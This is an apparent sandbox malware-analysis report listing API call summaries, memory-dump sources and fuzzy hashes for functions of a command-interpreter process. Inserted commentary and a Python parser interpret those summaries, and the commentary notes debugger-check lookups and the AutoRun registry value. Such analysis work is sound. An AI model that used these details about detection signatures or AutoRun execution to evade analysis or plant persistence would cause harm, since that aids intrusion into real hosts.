                                                                                        • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                        • Instruction Fuzzy Hash: 42D0123720607097CF39AB957A24F67BA159B81A90F1A006E790B97944C5148C42D6E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
• Instruction ID: 0eec78562824e58bf4331be21e3ccd91a7fc1c7a0d83e70eb26db6357782b9c8
• Opcode Fuzzy Hash: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
• Instruction Fuzzy Hash: 69B09226F590590449111C0878410F8FB35888B02AF1032D3D84CB74018102C419018A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction ID: 0ae82ce2589e5826a8dd2e9be093648865f6784b5710424acbd88ab407a10d1a
• Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction Fuzzy Hash: 70D0C935312D80CFD71ACB0DC894B0573A8FB44B44F8504E0E801CB722D22CD944CA04
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction ID: 0ddddf04f7e086dadd132fc9fbd8cf4c0a872deacd3cf0b267205480948826aa
• Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction Fuzzy Hash: 7FD0123610024CEFCB01EF40C850E5A7B2AFFC8710F108019FD190B6508A31ED62DA50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
• Instruction ID: c4809ea7a23139a19877d74234ee65374c68c6a125ec968e23252dfbbe2904b7
• Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
• Instruction Fuzzy Hash: 0AC0807C1413406EDF26D710C954B243A94EB00A09F4C01EC76441D4D1C759E5018204
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5944a38a0e61ffab93174410bd8a797b9ed49990df260aba81e0b26f1c1e3f7e
• Instruction ID: d8f3b8f0af65c6921db20bdfb16d989e4e4e160a212ba46c51615fab87bd692e
• Opcode Fuzzy Hash: 5944a38a0e61ffab93174410bd8a797b9ed49990df260aba81e0b26f1c1e3f7e
• Instruction Fuzzy Hash: 7C900232605414129540B15849845465005D7E1305B51C465F0418554CDB24895A6362
Uniqueness
Uniqueness Score: -1.00%

APIs
• InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00D9CA04), ref: 00D687EE
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D687FA
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D6880E
• SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D87460,00000001), ref: 00D6881B
• _get_osfhandle.MSVCRT ref: 00D68828
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68830
• _get_osfhandle.MSVCRT ref: 00D6883C
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68844
  • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E318
  • Part of subcall function 00D6E310: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E322
  • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E32F
  • Part of subcall function 00D6E310: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E339
  • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E35E
  • Part of subcall function 00D6E310: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E368
  • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E390
  • Part of subcall function 00D6E310: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E39A
  • Part of subcall function 00D6A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
  • Part of subcall function 00D6A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
  • Part of subcall function 00D6A9D4: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
  • Part of subcall function 00D6A9D4: memcpy.MSVCRT ref: 00D6AA09
  • Part of subcall function 00D6A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
  • Part of subcall function 00D68B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D6885E), ref: 00D68B9D
  • Part of subcall function 00D68B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6885E), ref: 00D68BA4
  • Part of subcall function 00D68273: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D682D3
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D68313
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D6834D
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D6839D
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D683D7
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D6886A
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D688A5
• GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00D68987
• GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000000,-00000105,00000000), ref: 00D689AB
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D689BC
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,00D9C9E0,00000008), ref: 00D6859E
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00D685BC
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00D68614
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00D68653
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00D9C9D0,00000008), ref: 00D6867D
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00D9C970,00000020), ref: 00D68698
  • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00D9C930,00000020), ref: 00D686B0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00D689CD
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D689D4
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 00D689E9
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00D68A23
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D68A2A
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D68AB5
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00D68AC0
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00D68AD1
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00D68AE7
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00D68AF8
• ??_V@YAXPAX@Z.MSVCRT ref: 00D68B18
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentFreeHandleLineStrings$BufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsmemcpy
• String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
• API String ID: 2256129397-3021193919
• Opcode ID: 948bef4e67e7f7723008a6c0627b2489077863e717e1277d83d4dfb720d8dbce
• Instruction ID: 73a2392fdb94f5ce37af8f61dcd46a6c9e6db3b6f4aa91e1fbf5ce628939c462
• Opcode Fuzzy Hash: 948bef4e67e7f7723008a6c0627b2489077863e717e1277d83d4dfb720d8dbce
• Instruction Fuzzy Hash: D191B371A40301AFDB14ABA8EC1AA7A37B5EB45701B08461AF506D73A1EF70DC41EB36
Uniqueness
Uniqueness Score: -1.00%
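
The API summary above is the most informative part of this dump section, but it rewards careful reading: entries marked "Part of subcall function" are inherited from callees and are not calls the function makes itself, a "?" argument is one the plugin could not recover, and each ref address has to be placed against the dump base (00D60000) to know which mapped region the code lives in. The snapshot name's `_cmd` suffix together with the reads of `Software\Microsoft\Command Processor` identify this region as the host command interpreter's own image rather than the other dumped regions of process 15 (03AB0000, and 02DD0000 with its Yara matches), so the `GetProcAddress(IsDebuggerPresent)` at 00D68AE7 is host start-up code, and a debugger-check signature that rests on this function alone should be weighted accordingly. The Python below is added here as an example; it is not code from the Joe Sandbox report or from any Joe Security tool. It parses this summary format into structured records and performs exactly those checks. Its line grammar is inferred from this listing only, the embedded sample is a constructed excerpt copied from the summary above, and the meaning of the dump-file name fields other than the PID and base address is left uninterpreted rather than assumed.

```python
"""Parser for the per-function 'APIs' / 'Memory Dump Source' summaries that Joe
Sandbox prints for each disassembled function (the blocks on this page). Added
example, not code from the Joe Sandbox report or from Joe Security; the line grammar
is inferred from this listing only, and dump-file name fields other than the PID and
base address are deliberately left uninterpreted."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Name.Module(args), ref: ADDR" or "• Part of subcall function FUNC: Name.Module(args), ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[^\s(]+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
# hcaresult_<pid>_<n>_<base>_<image>.jbxd; the trailing token names the process image
SNAP_RE = re.compile(r"Snapshot File:\s*hcaresult_(?P<pid>\d+)_\d+_[0-9A-Fa-f]+_(?P<image>\w+)\.jbxd")
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                # call-site address
    subcall: Optional[int]  # callee the call was inherited from; None if the function calls it directly

@dataclass
class FunctionSummary:
    calls: list = field(default_factory=list)
    dump_file: str = ""
    base: int = 0
    based_on_pe: bool = False
    pid: Optional[int] = None
    image: str = ""

def parse_summary(text: str) -> FunctionSummary:
    s = FunctionSummary()
    for line in text.splitlines():
        if m := API_RE.match(line):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            sub = int(m["sub"], 16) if m["sub"] else None
            s.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif m := SRC_RE.search(line):
            s.dump_file, s.base, s.based_on_pe = m["file"], int(m["base"], 16), m["pe"] == "true"
        elif m := SNAP_RE.search(line):
            s.pid, s.image = int(m["pid"]), m["image"]
    return s

def dump_pid_and_base(s: FunctionSummary) -> tuple:
    """Dump name: first dot-separated field is the PID in hex, fourth the base address."""
    parts = s.dump_file[: -len(".sdmp")].split(".")
    return int(parts[0], 16), int(parts[3], 16)

def dynamic_imports(s: FunctionSummary) -> list:
    """Names passed to GetProcAddress: APIs resolved at run time, not via the import table."""
    return [a for c in s.calls if c.name == "GetProcAddress"
            for a in c.args if a != "?" and not re.fullmatch(r"[0-9A-Fa-f]+", a)]

def registry_reads(s: FunctionSummary) -> dict:
    """Group RegQueryValueExW value names under the key opened by the preceding RegOpenKeyExW of the same (sub)function."""
    reads, current = {}, None
    for c in s.calls:
        if c.name == "RegOpenKeyExW" and len(c.args) >= 2:
            hive = HIVES.get(int(c.args[0], 16), c.args[0]) if re.fullmatch(r"[0-9A-Fa-f]+", c.args[0]) else c.args[0]
            current = (c.subcall, hive + "\\" + c.args[1])
            reads.setdefault(current[1], [])
        elif c.name == "RegQueryValueExW" and current and c.subcall == current[0] and len(c.args) >= 2:
            reads[current[1]].append(c.args[1])
    return reads

def summarize(text: str) -> dict:
    s = parse_summary(text)
    pid, base = dump_pid_and_base(s)
    direct = [c for c in s.calls if c.subcall is None]
    offsets = [c.ref - s.base for c in s.calls]  # negative => call site lies outside the dump
    return {"image": s.image, "pid": s.pid, "based_on_pe": s.based_on_pe,
            "pid_matches_dump": pid == s.pid, "base_matches_dump": base == s.base,
            "direct_calls": len(direct), "inherited_calls": len(s.calls) - len(direct),
            "offset_range": (min(offsets), max(offsets)),
            "dynamic_imports": dynamic_imports(s), "registry_reads": registry_reads(s)}

# Constructed sample input: lines copied from the first 'APIs' summary above.
SAMPLE = r"""
• InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00D9CA04), ref: 00D687EE
  • Part of subcall function 00D68273: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D682D3
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D68313
  • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D6834D
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00D68AD1
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00D68AE7
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00D68AF8
• ??_V@YAXPAX@Z.MSVCRT ref: 00D68B18
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
"""

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Run as-is to see the excerpt's summary; paste any other function summary from the report in place of SAMPLE to compare regions. "inherited_calls" should not be counted as behaviour of the function itself, and a negative offset in "offset_range" flags a call site the plugin attributed to a region it does not lie in. Applied to the registry-reading summary that follows, registry_reads also surfaces the AutoRun value of the same key, which the command interpreter executes at every start and which is therefore worth checking on the analysed host alongside the dumped regions.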

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D682D3
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D68313
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D6834D
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D6839D
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D683D7
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 00D68427
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00D68498
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 00D68526
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D6853A
                                                                                        • time.MSVCRT ref: 00D68554
                                                                                        • srand.MSVCRT ref: 00D6855B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                        • API String ID: 145004033-3846321370
                                                                                        • Opcode ID: 2ccbc194be76a9531fb5c7d7c5ff30efcf32667bc21b8ad3efa5ec7e1424e48f
                                                                                        • Instruction ID: ac872a7f3d8abb45c414373d1927b555cc391ee4ef9334a456ea1ea3632376a7
                                                                                        • Opcode Fuzzy Hash: 2ccbc194be76a9531fb5c7d7c5ff30efcf32667bc21b8ad3efa5ec7e1424e48f
                                                                                        • Instruction Fuzzy Hash: ACC17435900299EBDF328B54DD04BD97778FB09702F1081D6E589E2290EBB49AC8DF39
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D64781
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • _get_osfhandle.MSVCRT ref: 00D647E4
                                                                                        • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00D647EC
                                                                                        • _get_osfhandle.MSVCRT ref: 00D647FD
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D64805
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • _get_osfhandle.MSVCRT ref: 00D64832
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00D6483A
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D64871
                                                                                        • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00D78120
                                                                                        • memmove.MSVCRT ref: 00D78191
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00D78328
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7832F
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                        • String ID: DPATH
                                                                                        • API String ID: 2545859659-2010427443
                                                                                        • Opcode ID: 212ef73744715e6e69f123d2edc7a1d2fac1187f3c557dc5125eecfac08226e5
                                                                                        • Instruction ID: 432d42a9225c9902758eac97546d46dd4c06f03e5cb34afe4831c4f74d1e80f1
                                                                                        • Opcode Fuzzy Hash: 212ef73744715e6e69f123d2edc7a1d2fac1187f3c557dc5125eecfac08226e5
                                                                                        • Instruction Fuzzy Hash: 0CF19D715483419FD724DF24C848B6BB7E9EB88714F148A2EF889D7290EB70D805DBB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D709CB
                                                                                        • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00D709D8
                                                                                        • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00D709ED
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00D70A0A
                                                                                        • _setjmp3.MSVCRT ref: 00D70A72
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00D70AA3
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D70AB4
                                                                                        • exit.MSVCRT ref: 00D70ADA
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00D7E9E1
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D7E9EA
                                                                                          • Part of subcall function 00D71F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00D7EF7C,?,00000000,00000000), ref: 00D71FB2
                                                                                          • Part of subcall function 00D71F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00D7EF7C,?,00000000,00000000), ref: 00D71FCE
                                                                                          • Part of subcall function 00D71F1A: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D70A41), ref: 00D71F1A
                                                                                          • Part of subcall function 00D71F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D71F2B
                                                                                          • Part of subcall function 00D71F1A: memset.MSVCRT ref: 00D71F45
                                                                                          • Part of subcall function 00D687CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00D9CA04), ref: 00D687EE
                                                                                          • Part of subcall function 00D687CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D687FA
                                                                                          • Part of subcall function 00D687CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D6880E
                                                                                          • Part of subcall function 00D687CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D87460,00000001), ref: 00D6881B
                                                                                          • Part of subcall function 00D687CA: _get_osfhandle.MSVCRT ref: 00D68828
                                                                                          • Part of subcall function 00D687CA: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68830
                                                                                          • Part of subcall function 00D687CA: _get_osfhandle.MSVCRT ref: 00D6883C
                                                                                          • Part of subcall function 00D687CA: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68844
                                                                                          • Part of subcall function 00D687CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D6886A
                                                                                          • Part of subcall function 00D687CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D688A5
                                                                                        • _setjmp3.MSVCRT ref: 00D7EA5E
                                                                                        Strings
                                                                                        • Software\Policies\Microsoft\Windows\System, xrefs: 00D70A00
                                                                                        • DisableCMD, xrefs: 00D7E9D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLeaveValueexitmemset
                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                        • API String ID: 1095417628-1920437939
